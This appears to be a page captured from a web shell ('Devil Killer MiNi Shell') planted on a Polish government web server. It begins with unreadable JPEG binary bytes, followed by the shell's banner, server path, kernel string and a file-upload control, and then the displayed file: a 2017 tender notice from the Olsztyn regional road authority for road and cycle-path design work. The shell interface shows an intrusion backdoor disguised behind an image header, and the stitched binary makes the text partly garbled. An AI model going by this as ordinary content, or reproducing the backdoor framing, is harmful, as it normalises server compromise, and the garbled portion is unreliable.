JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170425/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170425/72876-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zdw.olsztyn.pl' target='_blank'>http://www.zdw.olsztyn.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 72876 - 2017
              z dnia 2017-04-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Olsztyn: Opracowanie dokumentacji projektowej z podziałem na części:
1.Rozbudowa drogi wojewódzkiej nr 538 w zakresie budowy ciągu pieszo-rowerowego w Biskupcu;
2.Przebudowa drogi wojewódzkiej nr 538 na odcinku Biskupiec - Bielice w zakresie wzmocnienia nawierzchni;
3.Rozbudowa drogi wojewódzkiej nr 537 w miejscowości Fijewo w zakresie budowy ciągu pieszo-rowerowego.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Wojewódzkich, krajowy numer identyfikacyjny
              51075125000000, ul.
              ul. Pstrowskiego 
              ,
              10602  
              Olsztyn, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              089 5346265 w. 22, e-mail
              przetargi@zdw.olsztyn.pl, faks
              895 399 876.
              <br />
              Adres strony internetowej (URL): www.zdw.olsztyn.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b></div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zdw.olsztyn.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Zarząd Dróg Wojewódzkich w Olsztynie, ul. Pstrowskiego 28b, 10-602 Olsztyn (kancelaria -pokój nr 18).</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji projektowej z podziałem na części:
1.Rozbudowa drogi wojewódzkiej nr 538 w zakresie budowy ciągu pieszo-rowerowego w Biskupcu;
2.Przebudowa drogi wojewódzkiej nr 538 na odcinku Biskupiec - Bielice w zakresie wzmocnienia nawierzchni;
3.Rozbudowa drogi wojewódzkiej nr 537 w miejscowości Fijewo w zakresie budowy ciągu pieszo-rowerowego.
<br /><b>Numer referencyjny: </b>ZDW/NZP.IP-2/PN/3220/43/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest: 
Przedmiotem niniejszego opisu są wymagania dotyczące wykonania i odbioru dokumentacji projektowej (wraz z uzyskaniem zaświadczenia o przyjęciu do wiadomości zgłoszonych robót budowlanych lub uzyskaniem decyzji o pozwoleniu na budowę, bądź decyzji o zezwoleniu 
na realizacje inwestycji drogowej) dotyczącego realizacji usługi pn.:
Opracowanie dokumentacji projektowej z podziałem na części:
1)	Rozbudowa drogi wojewódzkiej nr 538 w zakresie budowy ciągu pieszo-rowerowego                     w Biskupcu;
2)	Przebudowa drogi wojewódzkiej nr 538 na odcinku Biskupiec-Bielice w zakresie wzmocnienia nawierzchni;
3)	Rozbudowa drogi wojewódzkiej nr 537 w miejscowości Fijewo w zakresie budowy ciągu pieszo-rowerowego.
2.	    Przedmiot zamówienia obejmuje wykonanie w szczególności:
2.1. Aktualnej mapy sytuacyjno-wysokościowej do celów projektowych;
2.2. Inwentaryzacji stanu istniejącego, w tym działek planowanych do włączenia w pas drogowy,  istniejących obiektów inżynierskich, istniejących zjazdów, oznakowania pionowego wraz z jej aktualizacją na zakończenie dokumentacji projektowej;
2.3.  Dokumentacji geotechnicznej;
2.4.	Projektu budowlanego wraz z niezbędnymi opiniami, uzgodnieniami i decyzjami administracyjnymi;
2.5.   Projektu wykonawczego wraz z:
- specyfikacjami technicznymi wykonania i odbioru robót budowlanych (STWiORB),
- przedmiarem robót w układzie specyfikacyjnym,
- zatwierdzonym projektem stałej organizacji ruchu
2.6. 	Niezbędnych materiałów do uzyskania zaświadczenia o przyjęciu do wiadomości zgłoszonych robót budowlanych lub uzyskania pozwolenia na budowę (wraz 
z uzyskaniem pozwolenia oraz z decyzją lokalizacyjną jeżeli jest wymagana) bądź 
w przypadku trybu decyzji ZRID wszystkich niezbędnych materiałów do złożenia wniosku               o uzyskanie decyzji o zezwoleniu na realizacje inwestycji drogowej (ZRID) 
w tym załączników do decyzji ZRID, podziałów nieruchomości, wykazu właścicieli gruntów, ustalenie granic w terenie itp. (wraz z ostateczną decyzją ZRID);
2.7. Kosztorysu ofertowego (stanowiącego wzór do wypełnienia przez Wykonawców robót budowlanych) w układzie specyfikacyjnym z podziałem na branże;
2.8. Kosztorysu inwestorskiego w układzie specyfikacyjnym z podziałem na branże wraz ze zbiorczym zestawieniem kosztów.
3.   Do Wykonawcy należy także wykonanie:
- operatu wodno-prawnego, jeżeli jest wymagany,
- projektów branżowych uzgodnionych z właścicielami sieci,
- informacji dotyczącej bezpieczeństwa i ochrony zdrowia (zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz.1126),
- uzgodnień z Wojewódzkim Konserwatorem Zabytków,
- uzyskanie odstępstw od przepisów techniczno-budowlanych (w przypadku konieczności).
W celu określenia rodzaju podłoża pod projektowanym odcinkiem drogi Wykonawca powinien wykonać odwierty geotechniczne. Ilość odwiertów powinna być wystarczająca do prawidłowego wykonania dokumentacji projektowej i realizacji inwestycji.
4. Wykonawca nie będzie zobowiązany do pełnienia nadzoru autorskiego w ramach przedmiotu niniejszego zamówienia.
5. Szczegółowy opis przedmiotu zamówienia dla części nr od 1 do 3 zawarty jest w załączniku             nr 1 do SIWZ (Szczegółowy opis przedmiotu zamówienia), załączniku nr 6 do SIWZ                     (Wzór umowy) do SIWZ, załączniku nr 9 do SIWZ (Wyliczenie ceny kompletnej dokumentacji dla części nr od 1 do 3).
6.	Pełna dokumentacja przetargowa znajduje się na stronie internetowej Zamawiającego, pod adresem:	www.zdw.olsztyn.pl/zamówienia publiczne/aktualne do progów UE/ usługi
<br /><br /><b>II.5) Główny kod CPV: </b>71322000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 15<br /></div><br /><b>II.9) Informacje dodatkowe: </b>1. Termin wykonania zamówienia: 
15 m-cy od dnia podpisania umowy, z podziałem na etapy: 
- ETAP I  wykonanie koncepcji i jej zatwierdzenie przez Zamawiającego  w ciągu 4 m-cy od daty podpisania umowy;
- ETAP II  wykonanie i dostarczenie kompletnej dokumentacji projektowej  w ciągu 8 m-cy od dnia podpisania umowy;
-	ETAP III  uzyskanie zaświadczenia o przyjęciu do wiadomości zgłoszonych robót/ostatecznego pozwolenia na budowę/ostatecznej decyzji ZRID  w ciągu 15 m-cy od daty podpisania umowy.
Etap III może zostać skrócony o 1, 2 lub 3 m-ce (kryterium termin wykonania).
UWAGA:
Termin wykonania zamówienia może ulec zmianie w zależności od zaproponowanego                w ofercie Wykonawcy terminu skrócenia wykonania zamówienia w ramach pozacenowego kryterium oceny ofert. Skrócenie terminu wykonania w ramach kryterium oceny ofert dotyczy Etapu III.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku posiadania kompetencji lub uprawnień do prowadzenia określonej działalności. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku udziału w postępowaniu dotyczącego sytuacji  
ekonomicznej i finansowej. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                W zakresie warunku dysponowania zdolnością techniczną lub zawodową Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że:  
- dla części 1, 2 i 3: 
W okresie ostatnich trzech lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, zrealizował 1 usługę, polegającą na opracowaniu dokumentacji projektowej w zakresie budowy lub rozbudowy drogi klasy nie niższej niż G.
(W przypadku wspólnego ubiegania się dwóch, lub więcej Wykonawców o udzielenie niniejszego zamówienia, posiadaniem zdolności technicznej i zawodowej, w zakresie wskazanym w nin. sekcji (pkt 5.1.3 SIWZ), musi się wykazać jeden z Wykonawców wspólnie ubiegających się o zamówienie).   
(Droga w rozumieniu ustawy z dnia 21.03.1985 r. o drogach publicznych  t.j. Dz. U. z 2015 r., poz. 460 z późn. zm.; klasa drogi zgodnie z rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 02.03.1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie - Dz. U. z 2016 r., poz. 125).
Zamawiający informuje, że przez budowę należy rozumieć wykonanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego zgodnie z ustawą Prawo budowlane z dnia 7 lipca 1994 roku (Dz. U. z 2016 r., poz. 290).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">- odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku przesłanek do wykluczenia z postępowania określonych w punkcie 6.2 SIWZ na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp  należy złożyć na żądanie Zamawiającego;</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	  wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy  odrębnie dla każdej części, zgodnie ze wzorem załącznika nr 10 do SIWZ. 
            Jeżeli wykaz, oświadczenia lub inne złożone przez wykonawcę dokumenty budzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane, dostawy lub usługi były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa  w  art. 24 ust. 1 pkt. 23 ustawy Pzp - wg wzoru stanowiącego załącznik nr 5 do SIWZ. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielnie zamówienia (należy złożyć w terminie 3 dni od zamieszczenia na stronie internetowej www.zdw.olsztyn.pl informacji, o której mowa w art. 86 ust. 5 ustawy PZP, tj. informacji z otwarcia ofert); 2. Formularz ofertowy należy złożyć do oferty - ODRĘBNIE DLA KAŻDEJ CZĘŚCI - wg wzoru stanowiącego załącznik nr 4 do SIWZ (w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich Wykonawców składających ofertę wspólną); 3.Zastrzeżenie nieudostępniania informacji stanowiących tajemnicę przedsiębiorstwa zgodnie ze wzorem załącznika nr 7 do SIWZ, jeżeli Wykonawca zastrzega niejawność informacji stanowiących treść oferty, na podstawie art. 8 ust. 3 ustawy Pzp  należy złożyć do oferty; 4. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (zgodnie z pkt. 7.5.1 SIWZ)  w formie oryginału lub kopii poświadczonej notarialnie  należy złożyć do oferty; 5. Pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania Wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej)  w formie oryginału lub kopii poświadczonej notarialnie  należy złożyć do oferty; 6. Wyliczenie kompletnej ceny  należy złożyć do oferty, odrębnie dla każdej części wg wzoru stanowiącego załącznik Nr 9 do SIWZ.       W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia: 
1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w rozumieniu art. 23 ustawy Prawo zamówień publicznych) muszą spełniać następujące wymogi:
1.1.	wykonawcy występujący wspólnie są obowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu                          i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
1.2.	pełnomocnictwo  w postaci oryginału albo kopii poświadczonej za zgodność                          z oryginałem przez notariusza  powinno być złożone wraz z ofertą i zawierać także wskazania: przedmiotu zamówienia, którego dotyczy oraz wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, wymienionych z nazwy wraz z określeniem adresu i siedziby. 
1.3.	pełnomocnictwo musi być udzielone przez każdego z wykonawców ubiegających się wspólnie o udzielenie zamówienia i podpisane przez osoby uprawnione.
2.	Wykonawcy wspólnie ubiegający się o udzielnie zamówienia w celu wykazania spełnienia warunków udziału w postępowaniu i braku podstaw do wykluczenia złożą: 
2.1.	oświadczenie wymienione w punkcie 7.2.1. SIWZ - składa każdy z wykonawców wspólnie ubiegających się o zamówienie;
2.2.	dokument wymieniony w punkcie 7.3. A) i B) SIWZ  składa każdy z wykonawców wspólnie ubiegających się o zamówienie  na żądanie Zamawiającego;
2.3.	oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w pkt. 7.2.2. SIWZ - musi być złożona przez każdego Wykonawcę, (wg wzoru stanowiącego załącznik nr 5 do SIWZ).
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, w zakresie dokumentów, które każdego z nich dotyczą. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca w zakresie dokumentów, które każdego z nich dotyczą.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Wykonawca jest zobowiązany do wniesienia wadium na zasadach wskazanych 
w pkt. 9 SIWZ. 
